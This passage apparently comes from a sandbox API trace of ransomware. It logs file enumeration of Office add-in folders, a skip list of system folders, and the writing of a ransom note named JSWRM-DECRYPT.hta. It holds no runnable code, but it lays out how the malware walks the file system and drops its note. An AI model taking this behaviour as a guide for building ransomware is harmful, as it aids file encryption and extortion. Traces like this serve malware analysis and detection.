(lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.216] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.216] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.216] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.216] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.216] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.216] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0123.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0123.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0123.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0123.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x2455a8 [0123.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.216] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4b0be25, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4b0be25, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4c3d17b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.216] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.216] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.217] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.217] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.217] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.217] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.217] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.217] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.217] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.217] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0123.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0123.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0123.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0123.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244f90 [0123.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2455a8 | out: hHeap=0x1e0000) returned 1 [0123.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.217] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.217] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf12b7378, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf12b7378, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf12dd5ae, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x34040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.217] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.217] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.217] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.217] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.217] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.217] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.217] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.217] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.217] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.217] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0123.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.217] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0123.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0123.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0d8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0123.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244840 [0123.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244f90 | out: hHeap=0x1e0000) returned 1 [0123.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.218] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.218] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5101cbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5101cbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5101cbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8f040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.218] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.218] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.218] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.218] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.218] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.218] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.218] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.218] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.218] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.218] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0123.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.218] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.218] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0123.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.219] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ef08 [0123.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244840 | out: hHeap=0x1e0000) returned 1 [0123.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.219] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5101cbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5101cbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5101cbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8f040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 0 [0123.219] FindClose (in: hFindFile=0x232240 | out: hFindFile=0x232240) returned 1 [0123.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0123.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b480 | out: hHeap=0x1e0000) returned 1 [0123.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0123.219] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6bad1cb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x22f6470, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22f6470, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="lt", cAlternateFileName="")) returned 1 [0123.219] lstrcmpiW (lpString1="lt", lpString2=".") returned 1 [0123.219] lstrcmpiW (lpString1="lt", lpString2="..") returned 1 [0123.219] lstrcmpiW (lpString1="lt", lpString2="...") returned 1 [0123.219] lstrcmpiW (lpString1="lt", lpString2="windows") returned -1 [0123.219] lstrcmpiW (lpString1="lt", lpString2="recovery") returned -1 [0123.219] lstrcmpiW (lpString1="lt", lpString2="perflogs") returned -1 [0123.219] lstrcmpiW (lpString1="lt", lpString2="documents and settings") returned 1 [0123.219] lstrcmpiW (lpString1="lt", lpString2="$RECYCLE.BIN") returned 1 [0123.219] lstrcmpiW (lpString1="lt", lpString2="system volume information") returned -1 [0123.219] lstrcmpiW (lpString1="lt", lpString2="msocache") returned -1 [0123.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0123.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0123.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0123.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0123.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0123.220] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\lt\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\lt\\jswrm-decrypt.hta")) returned 0xffffffff [0123.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.220] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0123.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0123.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.221] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\lt\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\lt\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.222] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.222] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.223] CloseHandle (hObject=0x338) returned 1 [0123.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0123.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0123.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0123.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0123.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0123.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0123.223] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\lt\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\lt\\jswrm-decrypt.hta")) returned 0x20 [0123.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0123.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0123.223] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\lt\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6bad1cb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x22f6470, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x401c0c47, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0123.223] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.224] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6bad1cb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x22f6470, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x401c0c47, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.224] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.224] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.224] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x401c0c47, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x401c0c47, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x401c0c47, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.224] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.224] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.224] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.224] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.224] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.224] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.224] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.224] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.224] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.224] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0123.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.224] RtlAllocateHeap 